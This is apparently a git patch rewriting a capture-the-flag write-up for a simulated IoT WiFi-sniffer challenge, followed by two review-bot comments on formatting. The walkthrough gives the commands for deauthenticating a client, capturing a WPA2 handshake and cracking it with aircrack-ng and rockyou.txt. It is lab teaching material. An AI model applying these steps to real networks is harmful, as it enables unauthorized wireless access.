From 1b13d8fe656a186476b9e2c60c53e683d8d1f2fa Mon Sep 17 00:00:00 2001 From: Eun0us Date: Thu, 26 Mar 2026 17:33:30 +0000 Subject: [PATCH] write-up: IoT/Cr4cK_w1f1/README.md --- IoT/Cr4cK_w1f1/README.md | 97 +++++++++++++++++++++++++++++++--------- 1 file changed, 75 insertions(+), 22 deletions(-) diff --git a/IoT/Cr4cK_w1f1/README.md b/IoT/Cr4cK_w1f1/README.md index 13732f8..a6e41e5 100644 --- a/IoT/Cr4cK_w1f1/README.md +++ b/IoT/Cr4cK_w1f1/README.md 
@@ -1,27 +1,62 @@ -# Cr4ck_W1F1 — Solution +# Cr4cK_W1F1 -**Difficulty:** Medium | **Category:** IoT | **Flag:** `CTF{CR4CK_W1F1_EXAMPLE}` +| Field | Value | +|-------|-------| +| Category | IoT | +| Difficulty | Medium | +| Points | TBD | +| Author | Eun0us | +| CTF | Espilon 2026 | -> **Note:** Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement. +--- -## Overview +## Description -UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis -connecte au réseau pour lire le flag. +You recover a UART access on a red team WiFi sniffer tool. +Analyze the captured data to recover the WiFi password, then connect to the network and +retrieve the flag. -- **TX (port 1111)**: Read only -- **RX (port 2222)**: Write only +- TX (read UART): port 1111 +- RX (write UART): port 2222 -## Steps +--- -1. Ouvrir deux terminaux : +## TL;DR + +Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART +output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find +the passphrase `sunshine`, then connect and read the flag. + +--- + +## Tools + +| Tool | Purpose | +|------|---------| +| `nc` | Connect to UART TX/RX ports | +| `base64` | Decode the PCAP blob | +| `aircrack-ng` | Crack WPA2 handshake | +| `rockyou.txt` | Password wordlist | + +--- + +## Solution + +### Step 1 — Open both UART channels ```bash -nc 1111 # TX — lecture -nc 2222 # RX — écriture +# Terminal 1 — TX (read output) +nc 1111 + +# Terminal 2 — RX (send commands) +nc 2222 ``` -1. Dans RX, démarrer le sniffer et forcer un re-handshake : +> 📸 `[screenshot: two terminals showing TX output and RX prompt]` + +### Step 2 — Start the sniffer and force a deauth + +In the RX terminal: ```text sniffer start 
@@ -29,38 +64,56 @@ deauth TestNet 02:00:00:aa:00:01 sniffer stop ``` -1. Sur TX, récupérer le bloc PCAP base64 entre les marqueurs : +The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake. + +### Step 3 — Extract the PCAP from TX + +On the TX terminal, output appears between markers: ```text PCAP_BASE64_BEGIN -... + PCAP_BASE64_END ``` -Sauvegarder et décoder : +Copy the base64 lines to a file and decode: ```bash base64 -d handshake.b64 > handshake.pcap ``` -1. Cracker la capture : +> 📸 `[screenshot: TX output showing the PCAP_BASE64 markers]` + +### Step 4 — Crack the WPA2 handshake ```bash aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap -# → KEY FOUND! [ sunshine ] ``` -1. Se connecter au réseau et lire le flag : +Output: + +``` +KEY FOUND! [ sunshine ] +``` + +> 📸 `[screenshot: aircrack-ng finding the key]` + +### Step 5 — Connect and read the flag + +In the RX terminal: ```text connect TestNet sunshine cat /flag.txt ``` +> 📸 `[screenshot: RX terminal returning the flag after connecting to the network]` + +--- + ## Flag `CTF{CR4CK_W1F1_EXAMPLE}` -## Author - -Eun0us +> Note: This challenge was still being finalized at time of writing. The flag above is +> a placeholder; the real flag will be updated before deployment.
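Review bot: In the Step 1 fence of the first hunk, both `nc` invocations are missing the host argument (`nc 1111`, `nc 2222`); `nc` takes a host followed by a port, so as written the reader cannot run them. Suggest `nc <host> 1111` and `nc <host> 2222` (or the actual challenge host placeholder the CTF uses). Minor points in the same hunk: the metadata table still reads `| Points | TBD |`, which should be filled in or dropped before the write-up is published, and the TL;DR already states the passphrase `sunshine` ahead of the walkthrough; if that is intentional as a spoiler summary it is fine, otherwise consider leaving the value to Step 4.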
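Review bot: In the Step 3 marker block of the second hunk, the removed `-...` line is replaced by an empty `+` line, so the example no longer shows that the base64 payload sits between `PCAP_BASE64_BEGIN` and `PCAP_BASE64_END`; suggest a visible placeholder such as `<base64 lines>` so the "copy the base64 lines to a file" instruction has something to point at. Also, the `Output:` fence holding `KEY FOUND! [ sunshine ]` is the only untagged fence in the file (every other block uses ```bash or ```text); tag it ```text for consistency. Finally, the Step 5 `cat /flag.txt` step and the closing note both still refer to a placeholder flag, so the `## Flag` section should be revisited together with the deployment note when the real flag is set.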